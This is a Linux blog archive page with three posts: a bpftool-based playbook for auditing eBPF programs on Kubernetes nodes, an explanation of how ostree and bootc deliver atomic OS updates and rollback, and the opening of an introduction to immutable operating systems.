Linux Archives - Linuxcent

The Audit Playbook — Four Commands to See Any Cluster

Vamshi Krishna Santhapuri — Tue, 14 Jul 2026 02:00:00 +0000

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 14

TL;DR

You can audit eBPF programs on any Kubernetes cluster with four bpftool commands, regardless of which vendor’s tool loaded them — prog show, map show, net show (plus cgroup tree), and prog dump xlated
(bpftool = the kernel-shipped CLI for inspecting loaded eBPF programs and maps directly, independent of any userspace agent or vendor tooling)
bpftool prog show gives you the inventory: every loaded program, its type, and — via its pinned path — usually which tool owns it
bpftool map show gives you the state: what data each program is reading or writing, cross-referenced by the map_ids from the first command
bpftool net show and bpftool cgroup tree give you the attachment points: which interface, which qdisc, which cgroup hook — where enforcement actually happens
bpftool prog dump xlated gives you the behavior: what the program does at the instruction level, for the cases where the pinned path doesn’t tell you enough
This sequence works whether the cluster is running Cilium, Falco, Tetragon, a hand-rolled XDP filter, or something with no documentation at all — the kernel doesn’t care who loaded the program

You inherit a cluster with no runbook, no README, and no answer to “what’s making the policy decisions.” Something on these nodes is dropping packets, or blocking execs, or both — and you have about ten minutes before the incident call starts. kubectl get pods -A tells you nothing; whatever this is doesn’t run as a normal pod workload you can just describe.

Quick Check: Is Anything Actually Loaded on This Node?

# On any cluster node: count loaded eBPF programs
# (match header lines only; each program prints several lines)
bpftool prog show | grep -cE '^[0-9]+: '

# Expected output (a cluster running Cilium + Tetragon):
# 47

# Break it down by program type
bpftool prog show -j | jq -r '.[].type' | sort | uniq -c | sort -rn

# Without jq: the type is the second field of each header line
bpftool prog show | awk '/^[0-9]+: /{print $2}' | sort | uniq -c | sort -rn

#   12 cgroup_skb      ← Cilium's per-cgroup socket filtering
#    8 sched_cls       ← TC programs (Cilium's netdev enforcement, from EP08)
#    6 kprobe          ← Tetragon's syscall hooks (from EP12)
#    4 tracepoint      ← process/exec tracing (from EP13)
#    2 xdp             ← XDP fast-path filtering (from EP07)
#   (excerpt: remaining program types omitted)

Not running Cilium or Tetragon? On EKS or GKE? The count is rarely zero even on a “vanilla” managed cluster: systemd and the container runtime attach cgroup device filters on cgroup v2 hosts, and the CNI’s own eBPF datapath, an eBPF-based kube-proxy replacement (if enabled), and any sidecar-less service mesh all load programs. A count of zero on a production node is itself worth investigating; it usually means you’re looking at a node pool that hasn’t finished bootstrapping, or bpftool is running without the privileges it needs to enumerate programs. (A mount namespace that can’t see the host’s BPF filesystem hides pinned paths, not the programs themselves.)

Forty-seven loaded programs and no idea which ones matter. That’s the audit playbook’s job: turn “something is loaded” into “here is exactly what it is, what it holds, where it enforces, and what it does” — four commands, in order, no vendor documentation required.

Command 1: Inventory — What’s Loaded, and Who Owns It

bpftool prog show lists every eBPF program currently loaded into the kernel on that node, regardless of which process or tool loaded it. The kernel tracks programs independently of the userspace agent that created them: as long as a program is pinned or still attached to a hook, it keeps running even if that agent’s pod is deleted. Pinned paths appear in the output only when you pass -f (--bpffs), as the command below does.

bpftool -f prog show

6: cgroup_skb  tag 6deef7357e7b4530  gpl
    loaded_at 2026-06-02T03:14:22+0000  uid 0
    xlated 296B  jited 187B  memlock 4096B  map_ids 4,5
142: sched_cls  name cil_from_netdev  tag a04f5eef06a7f555  gpl
    loaded_at 2026-06-02T03:15:01+0000  uid 0
    xlated 12664B  jited 7532B  memlock 16384B  map_ids 9,10,11,14
    pinned /sys/fs/bpf/tc/globals/cil_from_netdev
201: kprobe  name generic_kprobe_e  tag 88df3d0a1c9e2b41  gpl
    loaded_at 2026-06-02T04:02:18+0000  uid 0
    xlated 3184B  jited 1980B  memlock 8192B  map_ids 22,23
    pinned /sys/fs/bpf/tetragon/generic_kprobe_e

Program tag: a truncated SHA hash of the program’s instruction stream, computed by the kernel at load time. Two programs with the same tag contain the same instructions (map references are zeroed before hashing), even if they were loaded by different processes or have different names. It’s how you confirm two clusters are actually running the same version of a security tool without comparing source.

Pinned path: a program pinned to /sys/fs/bpf/... survives after the process that loaded it exits, because the reference is held by a file in the in-kernel BPF filesystem instead of by an open file descriptor in a running process. Most production tools pin their programs; ad hoc programs loaded by a one-off script usually don’t, and unless an attachment still holds a reference to them (as netlink-attached XDP and TC programs do), they disappear the moment that script’s process exits.

The pinned field is doing most of the audit work here. /sys/fs/bpf/tc/globals/... is the iproute2 tc path that Cilium uses by convention. /sys/fs/bpf/tetragon/... is Tetragon’s. Falco’s eBPF probe modes may not pin at all, so look for Falco by program name as well as by path; its kernel-module driver is not eBPF and never appears in bpftool output. A program with no pinned line at all was loaded without a persistent reference. It’s worth asking what is keeping it alive: either a process holding its file descriptor open or an attachment to a hook. If that last reference goes away, the program unloads.

For operators (not writing eBPF): if a security tool’s DaemonSet pod restarts and its programs don’t reappear in bpftool prog show after the container comes back up, that’s a real signal — the tool failed to re-pin or re-attach, and you’re running with a gap in coverage even though the pod shows Running. This is a more reliable health check than the pod’s own readiness probe, which usually only checks that the userspace agent process is alive.
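The pinned-path conventions described in this section can be turned into a rough first-pass labeling. The sketch below is a hypothetical helper (label_owners is not part of bpftool) that reads saved `bpftool -f prog show` text on stdin and prints one line per program with a guessed owner. The path-to-owner mapping is only the convention named above, so the labels carry a question mark and are hints, not proof.

```shell
# Hypothetical helper: guess an owner for each program from its pinned path.
# Input: text output of `bpftool -f prog show` on stdin.
# Output: "<id> <type> <owner-guess>" per program.
label_owners() {
  awk '
    function emit() {
      if (id != "") print id, type, owner
    }
    /^[0-9]+: / {                 # a header line starts a new program
      emit()
      id = $1; sub(/:$/, "", id)
      type = $2
      owner = "unpinned"
      next
    }
    $1 == "pinned" {              # path prefixes are conventions only
      if (index($2, "/sys/fs/bpf/tc/globals/") == 1)     owner = "cilium?"
      else if (index($2, "/sys/fs/bpf/tetragon/") == 1)  owner = "tetragon?"
      else                                               owner = "unknown-pin"
    }
    END { emit() }
  '
}

# Usage on a node (not run here):
#   bpftool -f prog show | label_owners
```

Anything labeled unpinned or unknown-pin is where the later commands in this playbook earn their keep.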

Command 2: State — What Data These Programs Are Keeping

Every map_ids value in the prog show output points at a BPF map — the persistent, kernel-resident data structure the program reads or writes on every invocation (see eBPF Maps for how these work). bpftool map show inventories them the same way.

bpftool map show id 9

9: hash  name cilium_lb4_service  flags 0x0
    key 8B  value 24B  max_entries 65536  memlock 6291456B

bpftool -f map show id 22

22: lru_hash  name tg_execve_map  flags 0x0
    key 4B  value 128B  max_entries 32768  memlock 12582912B
    pinned /sys/fs/bpf/tetragon/tg_execve_map

Map ID 9 is a service load-balancer table with room for 65,536 entries, keyed by a service identifier. Map ID 22 is Tetragon’s exec cache (the same process-tracking structure covered in process lineage reconstruction), an LRU hash that evicts its least recently used entries once it holds 32,768 of them.
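Following map_ids from a program to its maps is mechanical enough to script. A minimal sketch, assuming saved `bpftool prog show` text on stdin; map_ids_for is a hypothetical helper name, not a bpftool subcommand.

```shell
# Hypothetical helper: print the map IDs referenced by one program.
# $1: program ID; stdin: text output of `bpftool prog show`.
map_ids_for() {
  awk -v want="$1:" '
    /^[0-9]+: / { cur = $1 }      # remember which program we are inside
    cur == want {
      for (i = 1; i < NF; i++)
        if ($i == "map_ids") {
          n = split($(i + 1), ids, ",")
          for (j = 1; j <= n; j++) print ids[j]
        }
    }
  '
}

# Usage on a node (not run here):
#   bpftool prog show > progs.txt
#   for id in $(map_ids_for 142 < progs.txt); do bpftool map show id "$id"; done
```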

The name field alone often tells you what the map is for — cilium_lb4_service, tg_execve_map — because most production tools name their maps descriptively rather than leaving them anonymous. When a map has no descriptive name, dump a few entries and read the shape of the data:

bpftool map dump id 9 | head -5

key: 0a 00 00 01 00 00 00 50  value: c0 a8 01 0a 00 00 00 50 00 00 00 01 ...

Raw bytes without a BTF type description are harder to read, but the sizes still tell you something: an 8-byte key and a 24-byte value in a hash map sized for 65,536 entries describe a fixed-size lookup table, consistent with a service or connection map rather than a log or event buffer.
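When a dump has no BTF, a quick way to test a guess about its layout is to decode a few bytes by hand. The sketch below assumes, purely for illustration, that four consecutive bytes hold an IPv4 address in network byte order; the real layout of any given map is defined by the tool that created it, and hex_ipv4 is a hypothetical helper.

```shell
# Hypothetical helper: render four hex byte tokens as a dotted IPv4 address.
# Assumes network byte order; the layout itself is a guess to be verified.
hex_ipv4() {
  printf '%d.%d.%d.%d\n' "0x$1" "0x$2" "0x$3" "0x$4"
}

# First four key bytes and first four value bytes from the dump above
hex_ipv4 0a 00 00 01
hex_ipv4 c0 a8 01 0a
```

If the decoded values look like plausible service and backend addresses for the cluster, the guess is probably right; if they look like noise, try a different offset or byte order.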

Command 3: Attachment — Where Enforcement Actually Happens

Inventory and state tell you what’s loaded and what it remembers. They don’t tell you where in the packet or syscall path the program actually runs. bpftool net show answers that for network-attached programs (XDP and TC, from EP07 and EP08); bpftool cgroup tree answers it for cgroup-attached programs (socket and syscall hooks). Kprobe and tracepoint programs such as Tetragon’s appear in neither; bpftool perf show and bpftool link show list those attachments.

bpftool net show

xdp:
eth0(2) driver id 88 tag 3b185187f1855c4c

tc:
eth0(2) clsact/ingress cil_from_netdev id 142
eth0(2) clsact/egress cil_to_netdev id 143

bpftool cgroup tree

CgroupPath
ID       AttachType      AttachFlags     Name
/sys/fs/cgroup
         6        cgroup_skb      multi
        18        cgroup_sock_addr multi           cil_sock4_connect

Program ID 142, the same cil_from_netdev you saw in the prog show output, is attached at the ingress hook of eth0’s clsact qdisc. That’s a direct answer to “is something making kernel-level policy decisions on this interface”: yes, at TC ingress, before the packet reaches any userspace process. Program ID 6 (cgroup_skb) is attached at the root cgroup with the multi flag, meaning it stacks with other programs there rather than replacing them, so the enforcement isn’t exclusive to one tool.

multi vs exclusive attach flags: a cgroup attachment can either replace whatever was attached before (exclusive) or stack alongside it (multi, BPF_F_ALLOW_MULTI). TC programs coexist differently, as separate filters ordered by priority on the same qdisc. A cluster running more than one eBPF-based tool at the same cgroup hook relies on multi attachment; if you see an exclusive attach where you expected two tools to coexist, one of them silently lost its hook.
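To join attachment points back to the inventory, it helps to reduce net show output to one line per attached program ID. A minimal sketch, assuming the plain-text layout shown above (section headers such as xdp: and tc:, followed by lines containing "id N"); attached_ids is a hypothetical helper name.

```shell
# Hypothetical helper: list network attachments as
# "<section> <interface> <hook> <prog-id>".
# stdin: text output of `bpftool net show`.
attached_ids() {
  awk '
    /^[a-z_]+:$/ { section = $1; sub(/:$/, "", section); next }
    {
      for (i = 1; i < NF; i++)
        if ($i == "id") print section, $1, $2, $(i + 1)
    }
  '
}

# Usage on a node (not run here):
#   bpftool net show | attached_ids
```

Each program ID in the last column can then be looked up in the prog show output from command 1.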

Command 4: Behavior — What It Actually Does

The first three commands answer what’s loaded, what it remembers, and where it runs. They don’t answer what it does — and that matters when the pinned path is missing, unfamiliar, or you don’t trust it. bpftool prog dump xlated shows the program’s instructions after the verifier’s transformations, in a readable pseudo-assembly.

bpftool prog dump xlated id 142 | head -12

   0: (b7) r0 = 0
   1: (61) r2 = *(u32 *)(r1 +76)
   2: (61) r3 = *(u32 *)(r1 +80)
   3: (bf) r1 = r6
   4: (85) call bpf_skb_load_bytes#26
   5: (16) if w0 == 0x8 goto pc+3
   6: (05) goto pc+9
   7: (61) r1 = *(u32 *)(r6 +0)
   8: (55) if r1 != 0x800 goto pc+7

You don’t need to hand-trace every instruction to get value out of this. Look for the helper calls — bpf_skb_load_bytes, bpf_map_lookup_elem, bpf_redirect, bpf_ktime_get_ns — because they name the kernel facilities the program actually touches. A program whose xlated dump is full of bpf_map_lookup_elem and comparison instructions against 0x800 (IPv4’s EtherType) is doing packet classification. One full of bpf_probe_read and bpf_get_current_task is reading process or memory state, not packets — a strong signal you’re looking at an observability or enforcement hook, not a network one, whatever its pinned path claims.

For operators (not writing eBPF): you will not read xlated dumps line by line during an incident. What you’re checking for is much narrower — does the helper call list match what the tool’s marketing says it does? A program that claims to be “read-only observability” but calls bpf_skb_store_bytes (which writes packet data) is not read-only. That mismatch is worth escalating before you trust the tool’s own dashboard.
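The helper-call check described above can be reduced to a filter over the xlated dump. This is a sketch under stated assumptions: it expects the "call bpf_name#N" form shown in the excerpt, and the list of state-modifying helpers in writes_state is a small, non-exhaustive sample chosen for illustration. Both function names are hypothetical.

```shell
# Hypothetical helper: print the unique helper names called in a dump.
# stdin: text output of `bpftool prog dump xlated id N`.
helper_calls() {
  sed -n 's/.*call \(bpf_[a-z0-9_]*\).*/\1/p' | sort -u
}

# Exit 0 if the dump calls any helper from a short, non-exhaustive list
# of helpers that modify packets, user memory, or process state.
writes_state() {
  helper_calls |
    grep -qxE 'bpf_(skb_store_bytes|probe_write_user|override_return|send_signal)'
}

# Usage on a node (not run here):
#   bpftool prog dump xlated id 142 | helper_calls
#   bpftool prog dump xlated id 142 | writes_state && echo "not read-only"
```

A clean result from writes_state does not prove a program is read-only, since the list is incomplete; a hit is the useful signal.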

Production Gotchas

bpftool needs root (or CAP_BPF plus the related capabilities on newer kernels), and managed nodes don’t hand that out by default. On EKS and GKE, you typically can’t SSH to a node directly. Use kubectl debug node/<node-name> --image=<image> -it -- chroot /host to get a shell with host PID and network namespace access (recent kubectl versions accept --profile=sysadmin if the default debug pod isn’t privileged enough for bpftool), or the cloud provider’s own access path (AWS SSM, gcloud compute ssh). Confirm the debug image actually ships bpftool; it’s not in most minimal base images.

Program IDs are node-local and not stable across restarts. ID 142 today may be ID 89 after the node reboots and the DaemonSet reloads its programs. Don’t hardcode IDs in runbooks; always start from bpftool prog show on the specific node and re-derive the ID for that session.

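xlated and jited dumps depend on privileges and hardening settings, not just on the program. The kernel withholds instruction dumps from callers without sufficient capabilities, and hardened nodes that set kernel.kptr_restrict or net.core.bpf_jit_harden can leave prog dump returning less than shown here. kernel.bpf_stats_enabled is unrelated: it only controls the run-time counters (run_time_ns, run_cnt) in prog show. If dumps come back empty, check your capabilities and those two sysctls before assuming the program itself is hiding something.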

bpftool cgroup tree only walks the cgroup hierarchy visible to it. On a Kubernetes node, run it against the root of the host’s cgroup filesystem (typically after the chroot /host from the debug pod above), not from inside a container’s own cgroup namespace, or you’ll only see a fraction of the attachments.

Pinned paths are a convention, not a guarantee. Nothing stops a tool from pinning under an unexpected path, or not pinning at all. Treat the pinned-path-to-vendor mapping as a strong hint that narrows your investigation, not as ground truth. When ownership matters for an incident rather than a routine audit, confirm it by comparing the tag (command 1) against a known-good node running the same tool version, or against program hashes the vendor publishes, if it publishes any.
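Because program IDs differ between nodes while tags do not, comparing two nodes comes down to comparing their sets of (type, tag) pairs. A minimal sketch, assuming saved `bpftool prog show` text from each node; prog_tags is a hypothetical helper name.

```shell
# Hypothetical helper: print sorted, unique "<type> <tag>" pairs.
# stdin: text output of `bpftool prog show`.
prog_tags() {
  awk '
    /^[0-9]+: / {
      for (i = 1; i < NF; i++)
        if ($i == "tag") print $2, $(i + 1)
    }
  ' | sort -u
}

# Usage (not run here), with output saved from two nodes:
#   prog_tags < node-a.txt > a.tags
#   prog_tags < node-b.txt > b.tags
#   diff a.tags b.tags && echo "same program set"
```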

Quick Reference

What you want to know	Command
What’s loaded (with pinned paths)	`bpftool -f prog show`
Program count by type	`bpftool prog show -j | jq -r '.[].type' | sort | uniq -c`
What state a program keeps	`bpftool map show id <map-id>` (from `map_ids` in prog show)
Sample map contents	`bpftool map dump id <map-id> | head`
Where it’s attached (network)	`bpftool net show`
Where it’s attached (cgroup)	`bpftool cgroup tree`
What it actually does	`bpftool prog dump xlated id <prog-id>`
Confirm identical bytecode across nodes	Compare `tag` values from `prog show`
Privileged shell on a managed node	`kubectl debug node/<node-name> --image=<image> -it -- chroot /host`

Key Takeaways

Four bpftool commands audit any eBPF-based tool on any Kubernetes cluster, regardless of vendor: prog show (inventory), map show (state), net show/cgroup tree (attachment), prog dump xlated (behavior)
The kernel tracks loaded programs independently of the userspace agent that loaded them — a program’s pinned path under /sys/fs/bpf/... usually identifies its owning tool by convention, but that convention is not enforced by the kernel
A program’s tag is a hash of its bytecode; matching tags across nodes confirm identical program versions without comparing source or vendor documentation
map_ids in prog show output link directly to bpftool map show, letting you trace from “a program is loaded” to “here’s exactly what data it reads and writes”
bpftool net show and cgroup tree answer where enforcement happens in the packet or syscall path — the same question the opening incident needed answered in ten minutes
When the pinned path and tag aren’t enough, bpftool prog dump xlated shows the actual kernel helper calls the program makes, which is the only way to confirm behavior when there’s no documentation to trust

What’s Next

EP14 is the audit playbook — the four commands you run in the first ten minutes on any cluster you’ve inherited, before you trust anything its existing tools tell you about themselves. EP15 goes deeper on one specific case where this matters most: Cilium’s own policy engine telling you traffic is allowed while packets keep dropping. bpftool map dump on the right map — not cilium policy get — is what shows you what’s actually being enforced.

Next: Cilium policy verification — what bpftool shows that cilium policy get doesn’t



Atomic OS Updates Explained: How ostree and bootc Actually Work

Vamshi Krishna Santhapuri — Mon, 06 Jul 2026 21:30:17 +0000

Reading Time: 7 minutes

Immutable OS Series, Episode 2

TL;DR

At the mechanism level, ostree stores every deployment as a content-addressed commit, not a set of files you overwrite; “atomic” is a property of the filesystem layout, not a promise a script makes
The actual atomicity boundary is a single bootloader configuration write — everything before that point is fully reversible, and everything after it is a clean boot into a complete, self-contained deployment
bootc builds on the same ostree deployment model but starts from a Containerfile, so building a bootable OS image uses the same toolchain as building an application container
Power loss mid-update is a non-event: the system reboots into whatever the bootloader pointed at before the write, because the new deployment was never referenced until that one atomic write succeeded
Rollback targets aren’t kept forever — garbage collection and configurable deployment limits mean “you can always roll back” has a real, finite window
This is the mechanism EP01 described in outline; this episode is what actually happens on disk

The Big Picture: A Commit Graph, Not a File Tree

ostree REPOSITORY (content-addressed objects)
─────────────────────────────────────────────
  commit A (hash 8f2a1c...)  ──parent──▶  commit B (hash 3b7e9d...)
       │                                        │
       │ checked out as                         │ checked out as
       ▼                                        ▼
  /ostree/deploy/os/deploy/8f2a1c...    /ostree/deploy/os/deploy/3b7e9d...
  (READ-ONLY bind mount → /)            (READ-ONLY bind mount → /, once active)

BOOTLOADER CONFIG (the atomicity boundary)
─────────────────────────────────────────────
  grub.cfg / loader entries
       │
       └── points to exactly ONE deployment directory at a time
           Changing this pointer IS the update. Nothing else has
           to happen for the new deployment to become "the OS."

In short, ostree never edits a running deployment’s files. It writes an entirely new, complete deployment as a set of immutable, content-addressed objects somewhere else on disk, and the update is committed the instant a single bootloader entry is rewritten to point at it. EP01 showed this from the outside: rpm-ostree status, rollback, a clean before/after. This episode is what’s actually happening underneath those commands.

Every Deployment Is a Commit, Not a Directory You Edited

A traditional package manager mutates the live filesystem in place: apt upgrade replaces /usr/bin/curl, and hundreds of other files, one at a time, on the same filesystem the kernel and every running process are using. Each individual file replacement may be safe, but the upgrade as a whole is not a single operation. If it is interrupted, or if two updates race, the result is whatever mix of old and new files the filesystem happened to hold when things stopped. There’s no defined “before” state to return to, because the before state was destroyed in place.

The alternative is the same declarative-artifact idea that Stratum’s HardeningBlueprint YAML applies to OS hardening (the artifact either fully exists or the build failed, with nothing skippable in between), extended down to the filesystem itself.

ostree does something structurally different: every file in a deployment is stored as an object named by the SHA-256 hash of its content, inside a repository (/ostree/repo). A deployment is a commit — a tree of these hashed objects, checksummed all the way up, the same content-addressing model Git uses for a repository’s history. Deploying an update means:

1. Pull or build the new commit into the local ostree repository (pure object storage; this doesn’t touch the running system at all)
2. Check out that commit into a new deployment directory (/ostree/deploy/<osname>/deploy/<commit-hash>), which still doesn’t touch the running system
3. Write a new bootloader entry pointing at that new deployment directory
4. Reboot

Steps 1 and 2 can take minutes, involve gigabytes of I/O, and fail halfway through with zero consequence — the running system’s deployment directory was never opened for writing. There is no partial-update state visible to anything, because nothing that’s currently running was ever touched.
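The content-addressing idea behind the object store can be illustrated in a few lines of shell. This is a toy model only, not ostree’s real on-disk format or API: store_object is a hypothetical function, and the flat objects/ directory is an assumption made for brevity. It does show the one property that matters here: identical content gets the same name, so it is stored once.

```shell
# Toy content-addressed store (NOT the real ostree repository layout).
# $1: repo directory, $2: file to store. Prints the object hash.
store_object() {
  sum=$(sha256sum "$2" | cut -d' ' -f1)
  mkdir -p "$1/objects"
  # The name is derived from the content, so a second copy of the
  # same bytes lands on the same path and is not stored again.
  [ -e "$1/objects/$sum" ] || cp "$2" "$1/objects/$sum"
  printf '%s\n' "$sum"
}

# Usage (not run here):
#   store_object /tmp/toy-repo /etc/hostname
```

Writing new objects this way never modifies an existing one, which is why staging a new commit cannot disturb the deployment that is currently running.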

The Atomicity Boundary: One Bootloader Write

“Atomic” specifically refers to step 3. The new bootloader configuration (a regenerated GRUB grub.cfg, or a systemd-boot loader entry file) is written out in full alongside the old one and then switched in with a single rename, so either the new entry is in place or it isn’t. There’s no meaningful “half-written bootloader entry” state that a power failure can leave you in: at boot, the bootloader reads whatever configuration fully exists, and that configuration names exactly one default deployment.

POWER LOSS DURING STEP 1 or 2 (pulling/staging the new commit)
────────────────────────────────────────────────────────────
Next boot: bootloader entry still points at the OLD deployment.
The new commit's partial objects sit in the repo, orphaned,
inert. System boots exactly as if the update never started.

POWER LOSS DURING STEP 3 (bootloader entry write)
────────────────────────────────────────────────────────────
Filesystem-level atomic rename guarantees the entry write itself
either completes or doesn't. Next boot: either the old deployment
(write didn't land) or the new one (write landed) — never a
corrupted bootloader config caught in between.

POWER LOSS AFTER STEP 3, BEFORE REBOOT
────────────────────────────────────────────────────────────
Doesn't matter — the running system hasn't changed. The new
deployment activates on the NEXT boot, whenever that happens.

This is the property EP01 called “the system is never caught half-updated,” and now you can see exactly why: every step before the bootloader write is invisible to the running system, and the bootloader write itself is committed with a rename, which the filesystem already guarantees is atomic. There’s no custom transaction logic to trust. It’s a property of doing the update in the right order, using a write that was already atomic.
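The write-then-rename pattern is easy to reproduce with a symlink standing in for the bootloader pointer. The sketch below is an illustration of the general technique, not ostree’s actual code path; switch_deployment and the current link name are hypothetical, and mv -T assumes GNU coreutils.

```shell
# Illustration of an atomic pointer swap (not ostree's implementation).
# $1: directory holding the "current" symlink, $2: deployment name.
switch_deployment() {
  # Build the new pointer under a temporary name first...
  ln -s "$2" "$1/current.tmp.$$" &&
  # ...then rename it over the old one. rename(2) replaces the
  # destination in one step, so readers see old or new, never neither.
  mv -T "$1/current.tmp.$$" "$1/current"
}

# Usage (not run here):
#   switch_deployment /srv/demo deploy-b
```

If the process dies before the mv, the old pointer is untouched and only a stray temporary link is left behind, which mirrors the power-loss cases listed above.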

bootc: The Same Model, a Container Build Toolchain

bootc uses this identical deployment mechanism — the on-disk layout, the bootloader swap, the rollback behavior are all the same ostree machinery. What bootc changes is how the commit gets built in the first place.

# Containerfile — this IS the OS image definition
FROM quay.io/fedora/fedora-bootc:41

RUN dnf install -y nginx && \
    systemctl enable nginx && \
    dnf clean all

# Standard container build — no special OS-image tooling required

# Build it exactly like an application container
$ podman build -t myregistry.example.com/os/web-node:v12 .
$ podman push myregistry.example.com/os/web-node:v12

# On the target machine — pulls the image, converts it to an
# ostree commit, stages it as the next deployment
$ bootc switch myregistry.example.com/os/web-node:v12
Queued for next boot: myregistry.example.com/os/web-node:v12
Please reboot to complete the update.

$ systemctl reboot

bootc switch and bootc upgrade do the same three-step dance as raw ostree: pull the new commit, stage a deployment directory, write the bootloader entry. The difference is entirely in step 1, where bootc converts OCI container image layers into an ostree commit instead of building one from package installation directly. Your existing container registry, existing Containerfile conventions, and existing image-signing pipeline all apply unchanged to what is, underneath, a bootable operating system.

Where ostree and bootc Actually Diverge

	Raw ostree (Fedora CoreOS style)	bootc
Image defined as	`rpm-ostree compose` treefile (custom format)	Standard `Containerfile`
Build tooling	ostree/rpm-ostree-specific	Any OCI-compatible builder (`podman`, `buildah`, `docker`)
Registry/distribution	ostree’s own HTTP-based repo protocol, or OSTree-in-OCI	Standard container registry (Quay, Docker Hub, ECR, GHCR)
Deployment mechanism on disk	ostree commits, A/B deployments	Identical — ostree commits, A/B deployments
Rollback command	`rpm-ostree rollback`	`bootc rollback`
Best fit	Teams already fluent in ostree/Fedora tooling	Teams that want OS images to fit their existing container CI/CD

Nothing about atomicity, rollback safety, or the deployment model changes between the two — bootc’s entire value proposition is packaging the same guarantee behind tooling most infrastructure teams already have muscle memory for.

The Part EP01 Didn’t Mention: Rollback Has a Shelf Life

“The previous deployment is always intact for rollback” (EP01’s phrasing) is true, but not indefinitely. Each deployment consumes real disk space — a full OS tree’s worth of objects, though ostree deduplicates identical objects across commits so an incremental update doesn’t cost a second full copy. Two mechanisms limit how far back you can actually roll:

Deployment count limits. Most configurations keep a bounded number of deployments (commonly 2–3). Once you’ve upgraded past that limit, the oldest deployment is pruned — rpm-ostree cleanup or an automatic policy removes it, and its objects become eligible for garbage collection if nothing else references them.

Garbage collection reclaims orphaned objects. ostree prune (or ostree admin cleanup on a deployed system) removes any object in the repository not reachable from a currently-kept deployment or a pinned ref. If you pruned a deployment last week and you need to roll back to it today, that commit is gone: not degraded, not slow to restore, simply no longer present.

# See exactly what's kept and what's eligible for cleanup
$ ostree admin status
  fedora-coreos 38.20240210.3.0 (booted)   # current
  fedora-coreos 38.20240115.2.0            # one rollback available

# Pin a deployment explicitly if you need a longer-lived rollback
# target than the default retention policy provides
$ ostree admin pin 1

If your incident-response plan assumes “we can always roll back to last month’s known-good state,” verify that against your actual retention policy — the default is usually one previous deployment, not an archive.

Quick Reference

# Inspect the commit graph and current deployments
ostree admin status                      # deployments + which is booted
ostree log <ref>                         # commit history for a branch
ostree show <commit>                     # inspect a specific commit

# rpm-ostree (Fedora CoreOS / Silverblue)
rpm-ostree status                        # current + staged, same as EP01
rpm-ostree cleanup -r                    # remove the rollback deployment (-p removes a pending one)

# bootc
bootc status                             # current + staged image
bootc switch <image>                     # move to a different image
bootc upgrade                            # pull latest tag, stage it
bootc rollback                           # revert to previous deployment

Production Gotchas

“Atomic” doesn’t mean “instant.” Staging a new deployment can take as long as a full OS install — the atomicity guarantee is about the swap being indivisible, not about the whole process being fast. Budget real time for the pull-and-stage phase in maintenance windows.

Deduplication means disk usage doesn’t scale linearly with deployment count, but it isn’t free either. A kernel or major package version bump touches enough objects that “just keep 5 deployments for safety” can use more disk than teams expect. Monitor the size of /ostree/repo rather than assuming it’s negligible.

Pinning a deployment and forgetting about it silently defeats garbage collection. ostree admin pin is the right tool for “I need to guarantee this stays available,” but a pinned deployment never gets reclaimed automatically — audit pins periodically or disk usage grows unbounded.

bootc’s registry dependency is a new failure mode ostree-native updates didn’t have. If your container registry is unreachable, bootc upgrade fails the same way a registry-down event fails an application deployment — factor registry availability into your OS update SLA the same way you already do for app deployments.

Key Takeaways

Every ostree deployment is a content-addressed commit, not a set of files mutated in place — that’s what makes “atomic” a filesystem property instead of a script’s promise
The actual atomicity boundary is a single bootloader entry write; everything before it is invisible to the running system, everything after it takes effect on next boot
bootc uses the identical deployment mechanism, but builds commits from standard Containerfiles and distributes them through standard container registries
Rollback is real but bounded — deployment limits and garbage collection mean “always roll back” has a specific, checkable retention window, not an unlimited one
ostree and bootc differ in build/distribution tooling, not in the safety guarantees the deployment model provides

What’s Next

EP02 covered the mechanism in the abstract. EP03 runs it day-to-day — Fedora CoreOS and Silverblue in practice: what changes about dnf install, package layering, troubleshooting, and rollback when you’re actually living on top of this model instead of reading about it.

Next: EP03 — Fedora CoreOS / Silverblue in Practice



What Is an Immutable OS — and Why Hardening Isn’t Enough

Vamshi Krishna Santhapuri — Mon, 06 Jul 2026 21:29:28 +0000

Reading Time: 7 minutes

Immutable OS Series, Episode 1

TL;DR

An immutable OS is one where the running root filesystem is read-only — the only way to change it is to boot a new, versioned image, never to mutate the one that’s live
Hardening an image proves it’s correct at build time. Immutability is what keeps that proof true after the image boots into production
The mechanism is atomic A/B updates: a new OS image is staged fully, then swapped in as one operation — the system is never caught half-updated
A bad update is one command away from undone: rpm-ostree rollback && systemctl reboot — no reinstall, no image rebuild
bootc, Fedora CoreOS/Silverblue, and Talos Linux are three real implementations of this model, each targeting a different deployment shape
This is not a replacement for Stratum’s hardening pipeline — it’s what keeps a hardened image hardened after it ships

The Big Picture: A Snapshot vs. a Guarantee

TRADITIONAL MUTABLE OS                    IMMUTABLE OS
────────────────────────                  ────────────

Golden image (grade: A)                   Deployment A (active, read-only)
        │ boots into prod                          │
        ▼                                           │  atomic swap
Running root filesystem (read-write)                ▼
        │                                  Deployment B (staged)
        │  SSH fix, config-mgmt run,               │
        │  ad-hoc package install                   │  if boot fails
        ▼                                           ▼
Drifted state — no build artifact         Rollback (one command,
matches what's actually running            no reinstall)

An immutable OS is a system whose root filesystem cannot be changed in place — every change ships as a new, complete, versioned image, and the system swaps to it atomically or not at all. That’s the one-sentence answer, and it’s the reason this series exists: a hardening pipeline can prove an image is correct on the day it’s built, but on a traditional mutable root filesystem, nothing stops that proof from becoming false the day after.

The Gap Stratum’s Grade Doesn’t Cover

Stratum’s series ended with a hardened, graded, pipeline-gated image — POST /api/pipeline/scan fails the build if the grade drops below B, so an unhardened image never reaches production. That solved a real problem: images used to ship broken by default, and now they don’t.

But watch what happens six weeks later. An on-call engineer SSHes into a production node at 2 a.m. to unblock an incident and leaves behind a one-line iptables rule that was never reviewed. A config-management run pushes an unrelated package upgrade because someone’s playbook target list was too broad. A well-meaning teammate installs a debugging tool “just for now” and forgets to remove it. None of this touches the build pipeline. None of it fails a scan, because no scan runs again after the image ships.

Six months later, an auditor asks for evidence that the instance matches its compliance grade. The honest answer is: it did, once, the day it was built. Nobody can say what’s true about it now — the golden image and the running system are two different, unreconciled things.

That’s the gap. Hardening is a build-time guarantee. Immutability is what makes it a runtime guarantee too, because there’s no path left for a change to happen except through the build pipeline that produced the image in the first place.

From Golden Images to Immutable OS: A Short History

Golden images (Stratum’s territory) solved the “every instance starts insecure” problem by baking the correct configuration in at build time — the same idea as infrastructure-as-code applied to an OS baseline. Configuration management tools (Ansible, Chef, Puppet) then tried to solve drift by re-applying the desired state on a schedule, converging the system back toward correctness every run.

